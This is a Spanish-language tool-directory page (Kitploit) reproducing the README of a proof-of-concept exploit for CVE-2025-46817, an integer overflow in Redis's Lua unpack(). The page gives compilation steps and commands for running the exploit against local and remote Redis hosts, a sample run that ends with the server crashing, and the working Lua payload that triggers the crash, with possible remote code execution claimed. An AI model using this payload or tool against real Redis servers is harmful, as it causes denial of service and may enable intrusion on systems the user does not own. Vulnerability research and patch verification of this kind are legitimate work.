Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-46817-PoC — Exploit basado en C para CVE-2025-46817, una vulnerabilidad de desbordamiento de enteros en Redis, que permite la detección de caídas y un posible RCE mediante una carga útil de Lua unpack(). | Kitploit
Herramientas/GitHubGitHub/slayerkkkk/cve-2025-46817-poc
Análisis de VulnerabilidadesExplotaciónFuzzingPruebas de PenetraciónSeguridad de Bases de Datos
GitHubslayerkkkk/cve-2025-46817-poc

CVE-2025-46817-PoC

Exploit basado en C para CVE-2025-46817, una vulnerabilidad de desbordamiento de enteros en Redis, que permite la detección de caídas y un posible RCE mediante una carga útil de Lua unpack().

Ver Repositorio
28hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de Desbordamiento de Enteros CVE-2025-46817 en Redis

Banner Language Platform

Una implementación ligera en C del exploit CVE-2025-46817 para la vulnerabilidad de desbordamiento de enteros en Redis.

🚀 Características

  • Ligero: Un único archivo C, sin dependencias externas más allá de hiredis
  • Rápido: Compilación nativa para máximo rendimiento
  • Salida Colorida: Hermosos colores e iconos en la terminal
  • Detección de Caídas: Detecta automáticamente caídas del servidor
  • Verificación de Versiones: Identifica versiones vulnerables de Redis
  • Soporte de Tiempo de Espera: Tiempos de espera de conexión configurables

📋 Requisitos

Ubuntu/Debian

root@kitploit:~
sudo apt-get update
sudo apt-get install build-essential libhiredis-dev

CentOS/RHEL

root@kitploit:~
sudo yum install gcc hiredis-devel

macOS

root@kitploit:~
brew install hiredis

🔧 Compilación

root@kitploit:~
gcc -o exploit exploit.c -lhiredis

🎯 Uso

Uso Básico

root@kitploit:~
./exploit -H 127.0.0.1 -P 6379

Objetivo Remoto

root@kitploit:~
./exploit -H 192.168.1.100 -P 6379 -t 5

Opciones de Línea de Comandos

root@kitploit:~
-H <host>    Host del servidor Redis (obligatorio)
-P <port>    Puerto del servidor Redis (obligatorio)  
-t <timeout> Tiempo de espera de conexión en segundos (por defecto: 10)
-h           Mostrar mensaje de ayuda

📊 Ejemplo de Salida

root@kitploit:~
 ██▓███   █     █░███▄    █  ▄▄▄▄    █    ██   █████▒ █████▒▓█████  ██▀███  
▓██░  ██▒▓█░ █ ░█░██ ▀█   █ ▓█████▄  ██  ▓██▒▓██   ▒▓██   ▒ ▓█   ▀ ▓██ ▒ ██▒
▓██░ ██▓▒▒█░ █ ░█▓██  ▀█ ██▒▒██▒ ▄██▓██  ▒██░▒████ ░▒████ ░ ▒███   ▓██ ░▄█ ▒
▒██▄█▓▒ ▒░█░ █ ░█▓██▒  ▐▌██▒▒██░█▀  ▓▓█  ░██░░▓█▒  ░░▓█▒  ░ ▒▓█  ▄ ▒██▀▀█▄  
▒██▒ ░  ░░░██▒██▓▒██░   ▓██░░▓█  ▀█▓▒▒█████▓ ░▒█░   ░▒█░    ░▒████▒░██▓ ▒██▒
▒▓▒░ ░  ░░ ▓░▒ ▒ ░ ▒░   ▒ ▒ ░▒▓███▀▒░▒▓▒ ▒ ▒  ▒ ░    ▒ ░    ░░ ▒░ ░░ ▒▓ ░▒▓░
░▒ ░       ▒ ░ ░ ░ ░░   ░ ▒░▒░▒   ░ ░░▒░ ░ ░  ░      ░       ░ ░  ░  ░▒ ░ ▒░
░░         ░   ░    ░   ░ ░  ░    ░  ░░░ ░ ░  ░ ░    ░ ░       ░     ░░   ░ 
             ░            ░  ░         ░                       ░  ░   ░     
                                  ░                                         
                    Herramienta de Exploit CVE-2025-46817
                   Desbordamiento de Enteros -> Cadena RCE
                   Acceso -> https://pwnbuffer.org/

    Autor: Slayerkkk
    Objetivo: Redis <= 8.2.1
    Tipo: Corrupción de Memoria -> Ejecución de Código

ℹ️ Probando conexión a 127.0.0.1:6379...
✅ Conexión exitosa
ℹ️ Versión de Redis: 8.2.1
❌ VULNERABLE - Versión <= 8.2.1
ℹ️ Probando scripting Lua...
✅ Lua habilitado (1+1=2)

🚀 INICIANDO EXPLOTACIÓN
==================================================
💀 Ejecutando payload del exploit...
    Payload: Desbordamiento de enteros mediante unpack()
💥 SERVIDOR CAÍDO - ¡Conexión perdida!

📊 RESULTADO DE LA EXPLOTACIÓN
==============================
  💥 Estado: caído (2.34s)

💀 ¡EXPLOTACIÓN EXITOSA - El servidor se ha caído!
   Vulnerabilidad CVE-2025-46817 confirmada

🛡️ Versiones Afectadas

  • Redis <= 8.2.1
  • Redis <= 8.0.3
  • Redis <= 7.4.5
  • Redis <= 7.2.10
  • Redis <= 6.2.19

🔍 Detalles Técnicos

Vulnerabilidad

El exploit apunta a un desbordamiento de enteros en la implementación de la función unpack() de Lua en Redis (luaB_unpack). Cuando se llama con parámetros específicos, la aritmética de enteros con signo se desborda, lo que provoca que Redis intente materializar una cantidad enorme de valores de retorno.

Payload del Exploit

root@kitploit:~
local data = {1, 2, 3}
return {unpack(data, -2147483648, 2147483647)}

Impacto

  • Caída del Servidor: Denegación de servicio inmediata
  • Corrupción de Memoria: Corrupción de heap/stack
  • RCE Potencial: La corrupción de memoria podría conducir a la ejecución de código

🎯 Resultados de Detección

La herramienta reporta uno de estos estados:

  • ✅ sobrevivió: El servidor manejó el payload (probablemente parcheado)
  • 💥 caído: El servidor se cayó (vulnerable)
  • ⚠️ tiempo de espera: El servidor se colgó (probablemente vulnerable)
  • ❌ error: Ocurrió otro error

🙏 Créditos

Autor: Slayerkkk
Sitio web: https://pwnbuffer.org

Descargar herramienta